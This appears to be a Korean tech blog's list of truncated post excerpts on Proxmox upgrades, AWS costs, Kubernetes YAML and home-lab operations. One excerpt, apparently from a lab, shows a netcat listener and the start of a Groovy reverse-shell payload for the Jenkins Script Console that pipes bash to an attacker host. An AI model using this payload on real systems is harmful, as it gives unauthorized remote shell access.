Proxmox의 dns를 내부 컨테이너를 바라보게하여 7에서 8로 넘어갈때 업데이트 무결성이 깨졌었다. 이와중 컨테이너들은 잘 동작하고 있었고 웹서버만 다운이 되어서 해결방법을 찾고있었다. Setting up initramfs-tools (0.140) ... update-initramfs: deferring update (trigger activated) Processing triggers for initramfs-tools (0.140) ... update-initramfs: Generating /boot/initrd.img-5.13.19-6-pve /etc/initramfs/post-update.d//proxmox-boot-sync: 10: /usr/sbin/proxmox-boot-tool: not ..
주거 목적용 집을 대출하여 구매하는 것은 지구에서 이제 막 쏘아올려진 로켓에 무거운 추를 다는 것과 같다. 우주까지 쏘아진 로켓에 무거운 추를 달아도 앞서 나갈 수 있다. 허나 투자 목적용 집은 그리하지 아니하다. 지구에서 이제 막 쏘아올려진 로켓에 엔진을 하나 더 다는 것과 같다.
요즘 AWS의 서비스들을 이용하면서 비용 명세서를 보았다. 그 항목들 중 하나 눈에 들어오는 것이 있었다. 그 것은 바로 공인 IPv4 사용에 따른 비용 이었다. AWS에서 IPv4를 사용하면서 비용절감하는 방법은 자기가 소유한 IP로 연결하는 BYOIP 뿐으로 알고있으며, 기업에서는 IDC 전용회선 비용이 워낙 비싸기에 AWS에서 발생하는 Public IPv4 비용은 고려사항이 아니라는 의견이 있다. 이러한 비용 정책이 변경 된 것이 IPv4 고갈의 영향이라고 한다. 이러한 고갈 사태로 인하여 신규 시장에 진입 또는 신규 오픈 서비스들에 대해서는 IPv6로 운영을 할 수 밖에 없는 상황에 처하는 개인 또는 기업들이 생겨날 것이다. 이에 대비를 위하여 생각해 본것은 다음과 같다. (사용자)IPv6 서비스..
공격자 nc -lvp 8080 Jenkins Script Console(Agent Host) String host="192.168.0.53"; int port=8080; String cmd="bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so...
한줄요약 Saving Plan은 등록 즉시 EC2 사용유무와 상관없이 비용이 청구되며 원칙상 취소는 불가하다. Support에 취소 문의 후 내부 프로세스에 따라 취소받음 이슈내용 Saving Plan 이란? AWS Saving Plan 구독 시 EC2를 사용하지 않아도 약정된 금액으로 시간당 비용 발생 됩니다. 사건내용 저는 0.05$로 1년 약정을 Add Cart하니 즉시 계약이 체결된 것입니다. 그 때부터 시간당 비용이 발생합니다. 저는 인터넷에 찾아봤지만 다들 뜬구름 잡는 업체의 비용 계산법 등 후기를 알지 못하여 답답했습니다. 그래서 공유드립니다. 저는 처음에 너무 놀라서 인터넷을 찾아보니 취소가 안된다는 것이었습니다. 1년에 40만원이 꼼짝없이 날아가게 생긴 것 입니다. 그래서 지푸라기 잡는 ..
프로토타입 형식의 소프트웨어 아키텍처는 모놀리식으로 개발을하여 테스트후 마이크로소프트웨어 아키텍처로의 이전의 필요성을 요즘 느끼고 있다. 그 중 하나의 과업은 내가 운영하는 서비스의 쿠버네티스 이전이다. 또한 안정성과 비용도 큰 부분을 차지한다. 대고객 서비스를 클라우드로 할 지 IDC에 장비를 넣어서 관리할지 고민이다. 한정된 자원의 효율적인 분배가 제일 고민이다. 실제 서비스를 만들어보고 운영해봄으로서 결정해도될것같다. 1U 서버를 구매해서 사무실에서 운영하다가 코로케이션을 넘기거나 해야겠다. 개발 및 운영 망을 각각 사무실 및 클라우드로 생각해봐야겠다. 쿠버네티스 환경으로 각각 구성해서 하면 될 듯 하다. 이렇게 되면 환경에 따른 세팅이 달라져 학습비용이 2배이상으로 증가한다. 하지만 EKS로 구성..
selector로 라벨을 지정하면 pv를 자동으로 선택하는 줄 알았다. 말그대로 라벨로 추가 필터링하는 기능이다. pvc 에서 volumeName으로 pv를 연결한다. namespace 상에 어플리케이션과 pvc는 같이 있어야하며 pv는 다른 namespace에 존재해도 된다. apiVersion: v1 kind: PersistentVolume metadata: name: nfs-pv spec: storageClassName: "" capacity: storage: 128Gi accessModes: - ReadWriteMany nfs: server: 192.168.0.210 path: /data/nfs apiVersion: v1 kind: PersistentVolumeClaim metadata: name..
헬름차트 구성도 종합 rabbitmq를 stateful 기반으로 작성하여 데이터가 유실되지 않도록 nfs 서버에 마운트하여 데이터를 관리하는 yaml 입니다. 네트워크 접속결과 구성파일 statefulset.yaml apiVersion: apps/v1 kind: StatefulSet metadata: namespace: rabbit name: rabbitmq spec: replicas: 1 serviceName: rabbitmq selector: matchLabels: app: rabbitmq template: metadata: labels: app: rabbitmq spec: containers: - name: rabbitmq image: rabbitmq:3-management env: - name: ..
개념 Service는 Pod을 외부에서 접속할 수 있도록 하는 오브젝트이다. 환경구성 deploy.yaml 다음은 예제에 사용된 nginx pod을 3개 생성하는 deployment 파일이다. 컨테이너 생성을 포함하며 pod가 replicas에 의해 3개 생성된다. labes라는 것을 이용하여 연관관계 생성한다. apiVersion: apps/v1 kind: Deployment metadata: name: nginx-deployment namespace: my-web # 네임스페이스 추가 labels: app: nginx-deployment spec: replicas: 3 selector: matchLabels: app: nginx-pod template: metadata: labels: app: ngi..
나의 빨간 pod들 혼자서 재기동을 반복한다. 서비스가 살아났다 죽었다 한다. 그 해결 방법은 디스크 용량 증설! 나의 경우 최소 워커노드에 32gb에서 160gb로 할당해주니까 정상적으로 돌아왔다
